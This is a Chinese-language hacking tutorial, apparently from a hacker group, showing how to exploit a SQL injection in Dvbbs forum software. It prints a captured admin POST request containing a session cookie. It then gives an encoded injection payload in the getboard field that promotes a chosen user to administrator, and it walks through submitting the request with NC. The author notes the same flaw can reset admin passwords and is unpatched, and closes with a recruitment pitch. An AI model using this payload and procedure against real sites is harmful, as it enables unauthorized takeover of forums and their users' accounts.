先找一个没有固顶帖子的版面，自己找找去。一个论坛总不可能哪个版块都有固顶吧？点进去看看有没有固定帖子什么的，我是用前天搞的一个论坛。当然要“符合”漏洞条件了。以前台管理员的身份登陆，也不一定要用前台管理员进去，一个斑竹就行，能固顶帖子就行了，然后随便发个帖子。

WSE抓包工具准备抓取提交的post信息，打开了之后点下确认操作。

截取到了post提交信息，复制下来，内容如下：

POST /bbs/admin_postings.asp?action=istop HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: shichr.com/bbs/admin_postings.asp?action=istop

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: [url=shichr.com]shichr.com

Content-Length: 144

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: dwebsiteshichr%2Ecom%2Dh%2D2003%2D3%2D14bbs=UserID=1&usercookies=0&password=3N263U7ggb314iwb&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=2182871850; ASPSESSIONIDCSDCCRAT=OLCEBFEBBKGIJKAAFDIEEHMF; upNum=0; Dvbbs=

istopaction=1&boardID=2&ID=7&title=&content=fff&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&alltop=1&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7

现在我们做什么呢？把getboard改成1,1);update [dv_user] set usergroupid=1 where userid=2;-- 不过我们得先转下unicode编码，用encoder.exe转一下，转换结果如下%31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20

把那个getboard=1把这个1换为注射语句就行了。这条语句的意思是将userid值为2的用户提到管理员组，不过只是前台管理员哦。然后算一下增加了多少个字符修改下Content-Length的值，我也懒得去数就改成278吧。修改完之后就用NC提交

提交前我给大家看一下数据库中的userid=2，哈，现在不是管理员

好，提交

我们看看userid=2的用户是否成为管理员了,userid=2对应的用户名是：Knight，为了省事，我就直接在后台查看下这个用户的权限是否为管理员了，

呵呵，真的提升为管理员了，这个漏洞不光可以将用户从普通权限提升为管理员，而且还可以直接更改后台管理员的密码，这够严重的吧？动网官方论坛到现在都还没出补丁。真够郁闷的

嘿，其实，我们只要是斑竹就可以做到，但是有点郁闷啊 ，哎，只有斑竹才可以，但是，我们也有这样一个思想，以后再想怎么利用吧，这文章来自卫队主站上，我给大家找下看，哈哈

会员下载区开通.VIP软件免费下载.，

完！

红色特卫队正在组建卫队原创组，希望大家不要保留技术，积极参与我们，谢谢~~3Q

〖红色特卫队〗-------- by weiyi